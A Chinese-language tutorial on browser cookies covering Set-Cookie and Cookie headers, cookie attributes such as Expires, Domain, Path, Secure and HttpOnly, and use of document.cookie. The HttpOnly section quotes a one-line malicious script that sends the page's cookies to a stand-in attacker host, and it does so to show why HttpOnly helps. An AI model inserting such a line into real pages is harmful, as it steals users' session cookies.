cookie

cookie

(一) cookie概述

Cookie 是服务器保存在浏览器的一小段文本信息,每个 Cookie 的大小一般不能超过4KB。浏览器每次向服务器发出请求,就会自动附上这段信息。

  • cookie是服务器保存在浏览器的一小段文本信息
  • 浏览器每次向服务器发出请求,就会自动附上这段信息

cookie的主要作用

cookie的主要作用:

  • 分辨两个请求,是否来自同一个浏览器
  • 保存一些状态信息 (登陆信息,购物车信息,颜色,字体,等)

查看浏览器是否打开cookie功能

window.navigator.cookieEnabled属性返回一个布尔值,表示浏览器是否打开 Cookie 功能。

window.navigator.cookieEnabld    // 返回一个布尔值,表示浏览器是否打开cookie功能

document.cookie


返回当前网页的cookie

document.cookie








cookie的生成 ------------------- http回应头信息

服务器如果希望在浏览器保存 Cookie,就要在 HTTP 回应的头信息里面,放置一个Set-Cookie字段。

  • 服务器如果想在浏览器中保存cookie,就要在HTTP回应的头部信息里,放置一个 Set-Cookie字段
  • HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie。
  • 除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性
  • 一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。
  • 如果服务器想改变一个早先设置的 Cookie,必须同时满足个条件:Cookie 的key、domain、path和secure都匹配。只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。

Set-Cookie:foo=bar                        // 在http回应 的头部信息里面设置

上面代码会在浏览器保存一个名为foo的 Cookie,它的值为bar




------------------------------------------

HTTP 回应可以包含多个Set-Cookie字段,即在浏览器生成多个 Cookie

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco            // http回应的头部中可以有多个Set-Cookie
Set-Cookie: tasty_cookie=strawberry

[page content]




------------------------------------------

除了 Cookie 的值,Set-Cookie字段还可以附加 Cookie 的属性

Set-Cookie: <cookie-name>=<cookie-value>; Expires=<date>     // expires属性,失效时间,GMT格式
Set-Cookie: <cookie-name>=<cookie-value>; Max-Age=<non-zero-digit>   // Max-age有效时长
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>   // 域名
Set-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>   // 路径
Set-Cookie: <cookie-name>=<cookie-value>; Secure   // 安全,只有https协议下可以发送cookie到服务器
Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly   // 指定cookie无法通过js脚本拿到





------------------------------------------

一个Set-Cookie字段里面,可以同时包括多个属性,没有次序的要求。

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly






------------------------------------------

如果服务器想改变一个早先设置的 Cookie,必须同时满足四个条件:Cookie 的key、domain、path和secure都匹配


Set-Cookie: key1=value1; domain=example.com; path=/blog    【【【 原始的Cookie 】】】


改变上面这个 Cookie 的值,就必须使用同样的Set-Cookie


Set-Cookie: key1=value2; domain=example.com; path=/blog    【【【 服务器改变Cookie 】】】


// 【浏览器改变cookie】必须设置 Expires 为过去的时间





-------------------------------------------------------------------------------

只要有一个属性不同,就会生成一个全新的 Cookie,而不是替换掉原来那个 Cookie。

Set-Cookie: key1=value2; domain=example.com; path=/

上面的命令设置了一个全新的同名 Cookie,但是path属性不一样。

下一次访问example.com/blog的时候,浏览器将向服务器发送两个同名的 Cookie。

----

Cookie: key1=value1; key1=value2

上面代码的两个 Cookie 是同名的,匹配越精确的 Cookie 排在越前面。



cookie的发送 ------------------- http请求头信息

浏览器向服务器发送 HTTP 请求时,每个请求都会带上相应的 Cookie。也就是说,把服务器早前保存在浏览器的这段信息,再发回服务器。这时要使用 HTTP 头信息的Cookie字段。

  • cookie的发送,使用 HTTP头信息的 Cookie 字段
  • Cookie字段可以包含多个 Cookie,使用分号(;)分隔。
  • 服务器收到浏览器发来的 Cookie 时,有两点是无法知道的:
    (1) Cookie 的各种属性,比如何时过期。
    (2) 哪个域名设置的 Cookie,到底是一级域名设的,还是某一个二级域名设的

Cookie: foo=bar

上面代码会向服务器发送名为foo的 Cookie,值为bar。



---------------------------------



Cookie字段可以包含多个 Cookie,使用分号(;)分隔。

Cookie: name=value; name2=value2; name3=value3


---------------------------------


GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry









生成cookie-响应头;发送cookie-请求头

cookie注意事项

  • 浏览器可以设置不接受 Cookie,也可以设置不向服务器发送 Cookie。

  • 浏览器的同源政策规定,两个网址只要域名相同和端口相同,就可以共享 Cookie
    注意,这里不要求协议相同。也就是说,http://example.com设置的 Cookie,可以被https://example.com读取。

  • Cookie 由 HTTP 协议生成,也主要是供 HTTP 协议使用。



(二) cookie的属性

Expires

expires属性指定一个具体的到期时间,到了指定的时间后,浏览器将不再保留这个cookie
expires的值是UTC格式,可以使用 Date.prototype.toUTCString() 进行格式转换

  • expires:失效,到期,的意思
  • 如果不设置 expires 属性,或者设为null,Cookie只在当前会话(session)有效,浏览器窗口一旦关闭,当前 Session 结束,该 Cookie 就会被删除。
  • 浏览器是根据本地时间,决定 cookie 是否过期,由于本地时间是不精确的,所以没有办法保证 cookie 一定会在服务器指定的时间过期

Max-Age

Max-Age属性 指定从现在开始,cookie存在的秒数,过了这个时间后,浏览器将不会保留这个cookie

Expires 和 Max-Age

如果同时指定了 Expires 和 Max-Age ,那么 Max-Age 将优先生效

Domain

Domain 属性指定,浏览器发出HTTP请求时,哪些域名要附带这个Cookie

  • domain:是域名,领土的意思
  • 如果没有指定Domain属性,浏览器将默认将其设为当前URL的一级域名
    比如www.example.com会设为example.com,而且以后如果访问example.com的任何子域名,HTTP 请求也会带上这个 Cookie。
  • 如果服务器在Set-Cookie字段指定的域名,不属于当前域名,浏览器会拒绝这个 Cookie。

Path

Path 属性指定,浏览器发出HTTP请求时,哪些路径要附带这个Cookie

  • 只要浏览器发现,Path属性是 HTTP 请求路径的开头一部分,就会在头信息里面带上这个 Cookie。
    比如,PATH属性是/,那么请求/docs路径也会包含该 Cookie。当然,前提是域名必须一致。

Secure

Secure 属性指定,浏览器只有在加密协议 HTTPS 下,才能将这个 Cookie 发送到服务器。

  • Secure:是安全的意思
  • 如果当前协议是 HTTP,浏览器会自动忽略服务器发来的Secure属性。该属性只是一个开关,不需要指定值。如果通信是 HTTPS 协议,该开关自动打开。

HttpOnly ------------------ 重要

  • HttpOnly属性指定该 Cookie 无法通过 JavaScript 脚本拿到,主要是Document.cookie属性、XMLHttpRequest对象和 Request API 都拿不到该属性。这样就防止了该 Cookie 被脚本读到,只有浏览器发出 HTTP 请求时,才会带上该 Cookie。

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

上面是跨站点载入的一个恶意脚本的代码,能够将当前网页的 Cookie 发往第三方服务器。

如果设置了一个 Cookie 的HttpOnly属性,上面代码就不会读到该 Cookie。

document.cookie

document.cookie属性用于读写当前网页的 Cookie。

  • 读取的时候,它会返回当前网页的所有 Cookie,前提是该 Cookie 不能有HTTPOnly属性。多个cookie之间,用 ; 分号分隔
  • document.cookie属性是可写的,可以通过它为当前网站添加 Cookie。
  • 写入的时候,Cookie 的值必须写成key=value的形式( 注意,等号两边不能有空格 )
  • 写入 Cookie 的时候,必须对分号、逗号和空格进行转义(它们都不允许作为 Cookie 的值),这可以用encodeURIComponent方法达到。
  • document.cookie一次只能写入一个 Cookie,而且写入并不是覆盖,而是添加。
添加cookie

document.cookie = 'name=wang'    // key=value的字符串

document.cookie = 'test1=hello';
document.cookie = 'test2=world';
document.cookie
// test1=hello;test2=world



document.cookie读写行为的差异:

(一次可以读出全部 Cookie,但是只能写入一个 Cookie),与 HTTP 协议的 Cookie 通信格式有关。

浏览器向服务器发送 Cookie 的时候,Cookie字段是使用一行将所有 Cookie 全部发送;

服务器向浏览器设置 Cookie 的时候,Set-Cookie字段是一行设置一个 Cookie。

  • 写入 Cookie 的时候,可以一起写入 Cookie 的属性。

document.cookie = "foo=bar; expires=Fri, 31 Dec 2020 23:59:59 GMT";


上面代码中,写入 Cookie 的时候,同时设置了expires属性。属性值的等号两边,也是不能有空格的。

各个属性的写入注意点如下。

各个属性的写入注意点如下。

  • path属性必须为绝对路径,默认为当前路径。
  • domain属性值必须是当前发送 Cookie 的域名的一部分。比如,当前域名是-
    example.com,就不能将其设为foo.com。该属性默认为当前的一级域名(不含二级域名)。
  • max-age属性的值为秒数。
  • expires属性的值为 UTC 格式,可以使用Date.prototype.toUTCString()进行日期格式转换。

document.cookie = 'fontSize=14; '
  + 'expires=' + someDate.toGMTString() + '; '
  + 'path=/subdirectory; '
  + 'domain=*.example.com';

删除一个cookie的值

  • 删除一个现存 Cookie 的唯一方法,是设置它的expires属性为一个过去的日期

添加cookie: 
document.cookie = 'name=wu'


删除cookie:
document.cookie = 'name=wu;expires=Thu, 01-Jan-1970 00:00:01 GMT';


上面代码中,名为fontSize的 Cookie 的值为wu,过期时间设为1970年1月1月零点,就等同于删除了这个 Cookie。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 219,589评论 6 508
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,615评论 3 396
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 165,933评论 0 356
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,976评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,999评论 6 393
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,775评论 1 307
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,474评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,359评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,854评论 1 317
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,007评论 3 338
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,146评论 1 351
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,826评论 5 346
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,484评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,029评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,153评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,420评论 3 373
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,107评论 2 356

推荐阅读更多精彩内容